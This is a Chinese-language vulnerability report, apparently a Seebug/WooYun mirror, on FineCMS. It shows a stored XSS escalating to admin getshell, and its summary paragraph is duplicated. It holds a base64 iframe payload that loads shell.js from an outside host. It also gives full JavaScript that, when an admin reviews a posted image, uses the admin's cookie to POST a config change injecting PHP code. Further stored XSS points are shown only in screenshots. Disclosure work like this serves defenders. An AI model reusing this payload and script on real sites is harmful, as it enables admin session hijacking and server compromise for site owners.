VULHUB ™

### 简要描述： FineCMS 最新版xss跨后台getshell和多处xss合集，我知道这个厂商习惯性忽略，但是这只是一个开始，一个开始，开始........................... ### 详细说明： 首先我们演示一下第一个xss,通过这个xss，反弹后台getshell: 第一步，我们注册一个用户，如果管理员审核通过，也就是说这个用户是个普通的正常用户 我们去图片发表处： [<img src="https://images.seebug.org/upload/201409/221817295191a22b7938ab7e018de1ce031c4e51.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/221817295191a22b7938ab7e018de1ce031c4e51.png) 下来我们看看本页也能弹出来: [<img src="https://images.seebug.org/upload/201409/22181759fcd24e1b7f85680f83a4658e18de429b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22181759fcd24e1b7f85680f83a4658e18de429b.png) 下来我们去后台看看 是否能够弹出来： [<img src="https://images.seebug.org/upload/201409/2218182675cd887de565ed955ded09a1320fb742.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2218182675cd887de565ed955ded09a1320fb742.png) [<img...

### 简要描述： FineCMS 最新版xss跨后台getshell和多处xss合集，我知道这个厂商习惯性忽略，但是这只是一个开始，一个开始，开始........................... ### 详细说明： 首先我们演示一下第一个xss,通过这个xss，反弹后台getshell: 第一步，我们注册一个用户，如果管理员审核通过，也就是说这个用户是个普通的正常用户 我们去图片发表处： [<img src="https://images.seebug.org/upload/201409/221817295191a22b7938ab7e018de1ce031c4e51.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/221817295191a22b7938ab7e018de1ce031c4e51.png) 下来我们看看本页也能弹出来: [<img src="https://images.seebug.org/upload/201409/22181759fcd24e1b7f85680f83a4658e18de429b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22181759fcd24e1b7f85680f83a4658e18de429b.png) 下来我们去后台看看 是否能够弹出来： [<img src="https://images.seebug.org/upload/201409/2218182675cd887de565ed955ded09a1320fb742.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2218182675cd887de565ed955ded09a1320fb742.png) [<img src="https://images.seebug.org/upload/201409/2218183728813e84c63cd12173a76e6b33373bf6.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2218183728813e84c63cd12173a76e6b33373bf6.png) ok 到这里我们已经看到了这个xss，肯定会引起管理员的审核： 下来我们更换xss的payload： 我们用iframe标签： 加载远端js `src='data:text/html;base64,<script src=http://10.65.10.70/shell.js ></script>'` 然后进行变性编码： `sda'"><iframe src='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEwLjY1LjEwLjcwL3NoZWxsLmpzID48L3NjcmlwdD4=' >` [<img src="https://images.seebug.org/upload/201409/22182928d1d420627e125d87544c2925375569e1.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22182928d1d420627e125d87544c2925375569e1.png) 下来我们来编写这个js的内容: ``` function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); postgo(); function postgo() { src="http://finecmstest.com/admin.php?c=system&m=index"; data="page=0&data%5BSYS_DEBUG%5D=FALSE&data%5BSYS_KEY%5D=***&data%5BSYS_EMAIL%5D=admin%40admin.com&data%5BSYS_ATTACHMENT_DIR%5D=&data%5BSITE_EXPERIENCE%5D=%E7%BB%8F%E9%AA%8C%E5%80%BC%27%2Bphpinfo%28%29%2C%2F%2F&data%5BSITE_SCORE%5D=%E8%99%9A%E6%8B%9F%E5%B8%81&data%5BSITE_MONEY%5D=%E9%87%91%E9%92%B1&data%5BSITE_CONVERT%5D=10&data%5BSYS_LOG%5D=FALSE&data%5BSITE_ADMIN_CODE%5D=FALSE&data%5BSITE_ADMIN_PAGESIZE%5D=8&data%5BSYS_MEMCACHE%5D=TRUE&memcache%5Bhostname%5D=127.0.0.1&memcache%5Bport%5D=11211&data%5BSYS_CRON_QUEUE%5D=1&data%5BSYS_CRON_NUMS%5D=20&data%5BSYS_CRON_TIME%5D=300&submit=%E6%8F%90%E4%BA%A4"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); cookie = document.cookie; if(_m=="POST"){ _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.setRequestHeader("Cookie",cookie); } _x.send(_a); return _x.responseText; } ``` 这里首先贴两张图片： [<img src="https://images.seebug.org/upload/201409/221837431982eb6dcfcf7413cf259b1ad619c8d0.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/221837431982eb6dcfcf7413cf259b1ad619c8d0.png) [<img src="https://images.seebug.org/upload/201409/2218375155dbd4c03eda5705b6644501ab8d31ce.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2218375155dbd4c03eda5705b6644501ab8d31ce.png) 当管理员审核刚才的图片时候，就会中招： [<img src="https://images.seebug.org/upload/201409/22184002b4c0a941c27f2e50fd70d81346c4c42d.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22184002b4c0a941c27f2e50fd70d81346c4c42d.png) ok证明到此为止 下来我们看看其他基础存储型xss： [<img src="https://images.seebug.org/upload/201409/221842273e32e7f85b2792325426f5319d47043b.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/221842273e32e7f85b2792325426f5319d47043b.png) [<img src="https://images.seebug.org/upload/201409/221843443d47bc462a402c073a2415b439d0d707.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/221843443d47bc462a402c073a2415b439d0d707.png) [<img src="https://images.seebug.org/upload/201409/2218435800c12a44074ec8fa1bc8bc65c94ce9d5.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2218435800c12a44074ec8fa1bc8bc65c94ce9d5.png) 看见了没有 这里弹出来了 [<img src="https://images.seebug.org/upload/201409/22184539bccd891663504d034519079ac04ace27.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22184539bccd891663504d034519079ac04ace27.png) 应该还有好多地方..................... ### 漏洞证明：